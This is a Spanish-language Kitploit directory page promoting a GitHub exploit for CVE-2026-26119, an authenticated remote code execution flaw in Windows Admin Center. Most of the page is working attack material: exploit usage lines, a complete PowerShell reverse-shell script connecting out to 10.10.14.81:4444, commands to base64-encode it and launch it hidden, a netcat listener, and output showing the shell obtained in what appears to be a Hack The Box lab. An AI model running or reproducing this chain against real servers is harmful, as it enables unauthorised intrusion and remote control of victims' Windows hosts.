Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-26119 — Exploit de ejecución remota de código autenticado para Windows Admin Center a través de WinREST/PowerShell invokeCommand; toma credenciales y ejecuta comandos arbitrarios de PowerShell, incluyendo shells inversas codificadas. | Kitploit
Herramientas/GitHubGitHub/cyb3rwitch3r/cve-2026-26119
ExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubcyb3rwitch3r/cve-2026-26119

CVE-2026-26119

Exploit de ejecución remota de código autenticado para Windows Admin Center a través de WinREST/PowerShell invokeCommand; toma credenciales y ejecuta comandos arbitrarios de PowerShell, incluyendo shells inversas codificadas.

Ver Repositorio
1hace 11 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-26119

WAC RCE - CVE-2026-26119 RCE autenticado en Windows Admin Center mediante WinREST/PowerShell invokeCommand.

Uso:

root@kitploit:~
    python3 wac_rce.py <user> <pass> "<powershell command>"
    WAC_PASS=<pass> python3 wac_rce.py <user>

Entorno:

root@kitploit:~
    WAC_BASE  - override target base URL (default below)
    WAC_PASS  - password, used if not passed positionally

root@kitploit:~
┌──(pwn㉿pwn)-[~/HTB/DanglingTree]
└─$ python3 wac_rce.py 'anderson.w' 'Password' 'whoami'      
danglingtree\anderson.w

Cómo obtener la reverse shell:

root@kitploit:~
cat > revshell.ps1 << 'EOF'                                      
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.81',4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535 | % {0}
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i)
    $sendback = (iex $data 2>&1 | Out-String)
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()
EOF
root@kitploit:~
cat revshell.ps1 | iconv -t utf-16le | base64 -w 0 > revshell.b64

crea un listener con nc:

root@kitploit:~
nc -nlvp 4444
root@kitploit:~
python3 wac_rce.py 'anderson.w' 'Password' "Start-Process powershell -WindowStyle Hidden -ArgumentList '-nop -enc $(cat revshell.b64)'"
root@kitploit:~
┌──(pwn㉿pwn)-[~/HTB/DanglingTree]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.81] from (UNKNOWN) [10.129.171.81] 54318
$Host.UI.RawUI.WindowTitle = "shell"
PS C:\Users\anderson.w\Documents>
Descargar herramienta